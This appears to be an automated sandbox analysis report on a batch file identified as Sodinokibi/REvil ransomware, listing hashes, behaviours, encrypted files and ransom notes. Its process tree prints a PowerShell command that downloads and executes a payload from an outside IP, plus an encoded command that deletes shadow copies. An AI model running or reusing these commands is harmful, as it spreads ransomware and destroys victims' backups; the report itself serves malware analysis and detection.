Analysis
-
max time kernel
115s -
max time network
126s -
platform
windows7_x64 -
resource
win7v191014 -
submitted
10-02-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
4jD1biG2.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
4jD1biG2.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
4jD1biG2.bat
-
Size
191B
-
MD5
6097db04a430a1a65515bae911e13c6e
-
SHA1
41f39ba8f63c6ff8067348f596155beb32c45f17
-
SHA256
5743310e1c2bd52d3abf50fa874a206e42a4aac4e182447e99f3cf32be4334ed
-
SHA512
22fd4f652757e39fca2fa7b8a5d51cf951b76b200764b0ad45aa01cd38f9cbfb63df5542f08606fc198857cdecf1e4fd14d1cd005805203469b9dbb9a52ed777
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/4jD1biG2
Extracted
Language
ps1
Source
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1536 powershell.exe Token: SeBackupPrivilege 1352 vssvc.exe Token: SeRestorePrivilege 1352 vssvc.exe Token: SeAuditPrivilege 1352 vssvc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1536 powershell.exe 1536 powershell.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\RegisterJoin.vsd powershell.exe File renamed C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.7tu3h3ky powershell.exe File renamed C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\PublishCopy.ppt powershell.exe File renamed C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\StepConnect.temp powershell.exe File opened for modification \??\c:\program files\UnprotectWait.html powershell.exe File renamed C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.7tu3h3ky powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\7tu3h3ky-readme.txt powershell.exe File renamed C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\DebugRevoke.txt powershell.exe File opened for modification \??\c:\program files\ImportLimit.rm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7tu3h3ky-readme.txt powershell.exe File created \??\c:\program files\7tu3h3ky-readme.txt powershell.exe File renamed C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.7tu3h3ky powershell.exe File renamed C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\MountBlock.xltx powershell.exe File renamed C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.7tu3h3ky powershell.exe File renamed C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.7tu3h3ky powershell.exe File created \??\c:\program files (x86)\7tu3h3ky-readme.txt powershell.exe File opened for modification \??\c:\program files\JoinMove.vbs powershell.exe File opened for modification \??\c:\program files\PushFormat.jpe powershell.exe File opened for modification \??\c:\program files\UseSkip.xps powershell.exe File renamed C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.7tu3h3ky powershell.exe File renamed C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.7tu3h3ky powershell.exe File renamed C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\UnregisterEnable.ods powershell.exe File opened for modification \??\c:\program files\WaitDebug.mhtml powershell.exe File opened for modification \??\c:\program files\ConfirmUpdate.mpeg2 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\7tu3h3ky-readme.txt powershell.exe File renamed C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.7tu3h3ky powershell.exe File opened for modification \??\c:\program files\ConvertFromGet.xla powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\o7x85unt95y.bmp" powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1216 wrote to memory of 1312 1216 cmd.exe powershell.exe PID 1312 wrote to memory of 1536 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 1536 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 1536 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 1536 1312 powershell.exe powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 1312 powershell.exe -
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.exepowershell.execmd.exedescription ioc process File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\F: powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4jD1biG2.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Discovering connected drives
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Discovering connected drives
PID:1536
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1352